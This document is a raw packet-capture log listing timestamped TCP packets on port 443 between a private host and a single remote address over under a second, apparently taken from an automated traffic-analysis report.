Jan 8, 2025 10:15:42.020267963 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.020277023 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.020343065 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.020528078 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.020543098 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.020613909 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.020620108 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.020850897 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.021125078 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.021141052 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.021183014 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.021198034 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.021229982 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.021395922 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.021639109 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.021653891 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.021729946 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.021729946 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.021735907 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.021917105 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.041336060 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.041354895 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.041419029 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.041429996 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.041626930 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.041670084 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.041685104 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.041729927 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.041735888 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.042169094 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.042359114 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.042372942 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.042431116 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.042438030 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.042664051 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.042774916 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.042789936 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.042864084 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.042870045 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.042989016 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.107043982 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.107079983 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.107175112 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.107175112 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.107186079 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.107359886 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.107379913 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.107438087 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.107438087 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.107444048 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.107626915 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.108014107 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.108028889 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.108118057 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.108124018 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.108494043 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.108540058 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.108597994 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.108654976 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.108659983 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.110290051 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.128160954 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.128180027 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.128308058 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.128314018 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.128463030 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.128556967 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.128572941 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.128652096 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.128657103 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.128853083 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.129132032 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.129148006 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.129216909 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.129223108 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.129451036 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.129637957 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.129652023 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.129702091 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.129705906 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.129729033 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.129760981 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.193900108 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.193923950 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.194091082 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.194103003 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.194250107 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.194267035 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.194284916 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.194344997 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.194350004 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.194360971 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.194864988 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.194885969 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.194932938 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.194941998 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.194962025 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.194973946 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.195435047 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.195453882 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.195513010 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.195513010 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.195518970 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.198411942 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.215013027 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.215029955 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.215094090 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.215100050 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.215143919 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.215143919 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.215437889 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.215454102 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.215521097 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.215527058 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.215950012 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.215970039 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.216012001 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.216017962 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.216039896 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.216059923 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.216419935 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.216435909 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.216483116 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.216489077 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.216521025 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.218738079 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.247208118 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.280694962 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.280720949 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.280875921 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.280898094 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.281133890 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.281152964 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.281219006 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.281230927 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.281703949 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.281718016 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.281836033 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.281852007 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.282210112 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.282233953 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.282282114 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.282282114 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.282295942 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.282398939 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.302011013 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.302037001 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.302136898 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.302156925 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.302464008 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.302484035 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.302536964 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.302544117 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.302552938 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.302862883 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.302877903 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.302943945 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.302944899 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.302953005 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.303431988 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.303453922 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.303518057 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.303518057 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.303524017 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.306334972 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.367854118 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.367878914 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.368015051 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.368036032 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.368247032 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.368268967 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.368335009 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.368335009 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.368341923 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.368814945 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.368829012 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.368921041 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.368927956 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.369055986 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.369080067 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.369143963 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.369143963 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.369149923 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.370248079 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.388896942 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.388925076 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.389012098 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.389019966 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.389066935 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.389343977 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.389359951 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.389445066 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.389451027 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.389846087 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.389863968 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.389966965 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.389966965 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.389972925 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.390399933 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.390403986 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.390414000 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.390439034 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.390469074 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.390475988 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.390497923 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.390508890 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.455997944 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.456026077 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.456098080 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.456147909 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.456156015 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.456163883 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.456176996 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.456185102 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.456192970 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.456223011 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.456294060 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.456300020 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.456525087 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.456546068 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.456588984 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.456595898 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.456613064 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.477349997 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.477366924 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.477474928 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.477489948 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.477778912 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.477794886 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.477854013 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.477860928 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.478419065 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.478430986 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.478492975 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.478499889 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.478519917 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.482081890 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.482099056 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.482161999 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.482168913 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.482220888 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.543642998 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.543663025 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.543797970 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.543807030 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.544121981 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.544142008 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.544212103 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.544218063 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.544254065 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.544667959 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.544683933 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.544861078 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.544874907 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.545181036 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.545200109 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.545326948 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.545334101 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.562494040 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.562510014 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.562593937 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.562603951 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.562640905 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.562896967 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.562920094 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.562988043 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.562995911 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.563030005 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.563431025 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.563445091 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.563487053 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.563492060 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.563558102 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.564002037 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.564021111 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.564069033 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.564074993 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.564093113 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.628813028 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.628828049 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.628925085 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.628933907 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.629216909 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.629235983 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.629276991 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.629282951 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.629311085 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.629601002 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.629616976 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.629661083 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.629667044 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.629692078 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.630040884 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.630059958 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.630100965 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.630115986 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.630140066 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.649466991 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.649483919 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.649559975 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.649568081 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.649590969 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.649899006 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.649916887 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.649966002 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.649971962 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.650006056 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.651041031 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.651055098 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.651109934 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.651117086 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.651154995 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.651448011 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.651482105 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.651521921 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.651521921 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.651530027 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.651547909 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.715704918 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.715730906 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.715822935 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.715838909 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.715848923 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.716195107 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.716214895 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.716259003 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.716264963 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.716326952 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.716684103 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.716696978 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.716742992 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.716749907 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.716772079 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.717226028 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.717243910 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.717284918 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.717291117 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.717331886 CET	49875	443	192.168.2.7	185.199.111.133
Jan 8, 2025 10:15:42.736284018 CET	443	49875	185.199.111.133	192.168.2.7
Jan 8, 2025 10:15:42.736308098 CET	443	49875	185.199.111.133	192.168.2.7
